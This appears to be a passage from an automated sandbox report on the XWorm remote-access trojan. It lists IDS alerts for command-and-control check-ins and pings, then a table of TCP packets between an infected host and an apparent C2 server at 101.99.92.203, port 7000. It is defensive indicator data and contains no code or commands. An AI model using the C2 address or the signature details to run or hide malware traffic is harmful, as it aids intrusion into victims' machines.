2024-10-26T08:53:52.976127+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:52.980186+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:53.289174+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:53.295160+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:56.390663+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:56.392838+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:58.676357+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:58.678258+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:02.665776+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:02.667429+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:07.668156+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:07.676210+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:08.507500+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:08.510187+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:08.624469+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:08.625811+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:08.753563+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:08.754877+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:11.912869+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:11.912869+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:23.336560+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:23.344229+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:24.211211+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:24.215005+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:34.462621+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:34.465448+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:34.580319+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:34.583186+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:35.258186+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:35.261598+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:35.956947+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:35.959915+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:38.992547+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:39.000265+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:41.908904+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:41.908904+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:42.164751+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:42.166457+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:44.724773+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:44.726261+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:44.843354+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:44.844727+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:49.040667+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:49.049263+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:54.882756+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:54.885849+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:54.999825+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:55.004059+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:01.977422+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:01.979041+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:04.382703+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:04.384220+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:04.992424+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:04.995620+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:05.093553+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:05.099330+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:05.109200+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:05.111333+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:05.226404+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:05.228286+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:10.062538+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:10.063221+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:12.211600+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:12.211600+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:12.211666+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:12.211666+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:24.727210+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:24.728281+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 08:51:16.330351114 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:51:16.335771084 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:51:16.335869074 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:51:16.447901011 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:51:16.453279018 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:51:31.134592056 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:51:31.142370939 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:51:31.380831957 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:51:31.434788942 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:51:31.606046915 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:51:31.611289024 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:51:41.905177116 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:51:41.950388908 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:51:45.816493988 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:51:45.821880102 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:51:46.067339897 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:51:46.077208042 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:51:46.082526922 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:00.497780085 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:00.512789011 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:00.757563114 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:00.761854887 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:00.775307894 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:11.907006979 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:11.950460911 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:15.185333014 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:15.200181007 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:15.438911915 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:15.440754890 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:15.455079079 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:18.216428041 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:18.230566025 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:18.469264030 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:18.473453999 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:18.487817049 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:19.935405970 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:19.948561907 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:20.187649012 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:20.189371109 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:20.203977108 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:23.341351986 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:23.363723040 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:23.631494045 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:23.633999109 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:23.652725935 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:28.622713089 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:28.630711079 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:28.870043993 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:28.872153044 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:28.877633095 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:29.112344027 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:29.119834900 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:29.360012054 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:29.368529081 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:29.373929024 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:30.185286045 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:30.191994905 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:30.430970907 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:30.433021069 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:30.441071987 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:33.747823954 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:33.754158020 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:33.794568062 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:33.799905062 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:33.826244116 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:33.831804037 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:33.872752905 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:33.878011942 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:33.935305119 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:33.943866968 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:33.993102074 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:33.997376919 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:34.045814037 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:34.133769035 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:34.135696888 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:34.143080950 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:34.182753086 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:34.184660912 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:34.192564964 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:34.192609072 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:34.201850891 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:34.242315054 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:34.244152069 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:34.252863884 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:41.908747911 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:42.028661966 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:43.138237953 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:43.154089928 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:43.392633915 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:43.397341013 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:43.411505938 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:43.982024908 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:43.997250080 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.107012987 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:44.122209072 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.138242960 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:44.153753042 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.169598103 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:44.185241938 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.236121893 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.238238096 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:44.253578901 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.361104965 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.362968922 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:44.378182888 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.422913074 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.427220106 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:44.485502958 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.485553980 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:44.491780043 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.499787092 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.499829054 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:44.514589071 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.747195005 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:44.751255989 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:44.765172958 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:49.481972933 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:49.494868040 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:49.733611107 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:49.736758947 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:49.750937939 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:50.669477940 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:50.682624102 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:50.921309948 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:50.923857927 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:50.937825918 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:53.747706890 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:53.761007071 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:53.999680996 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:54.002242088 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:54.015580893 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:54.622658968 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:54.636269093 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:54.795511961 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:54.809182882 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:54.880460978 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:54.884005070 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:54.898152113 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:55.053528070 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:55.056128025 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:55.075635910 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:59.716305971 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:59.727622986 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:59.763297081 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:59.776078939 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:59.778867006 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:59.790787935 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:59.794431925 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:59.807682037 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:59.825645924 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:59.838263988 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:59.841276884 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:59.854140997 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:59.966453075 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:52:59.971039057 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:52:59.983367920 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:00.028670073 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:00.030487061 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:00.042886019 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:00.045747042 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:00.046992064 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:00.076088905 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:00.077687979 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:00.083375931 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:00.133557081 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:00.133615017 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:00.146507978 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:00.163383961 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:00.164855957 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:00.221538067 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:02.840548992 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:02.853171110 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:03.091907978 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:03.097656965 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:03.110987902 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:10.028991938 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:10.039581060 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:10.278523922 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:10.281805992 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:10.292144060 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:11.887537956 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:11.934900999 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:20.357153893 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:20.362507105 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:20.601582050 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:20.604015112 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:20.609451056 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:25.376158953 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:25.381515026 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:25.684150934 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:25.689627886 CEST	49732	7000	192.168.2.4	101.99.92.203
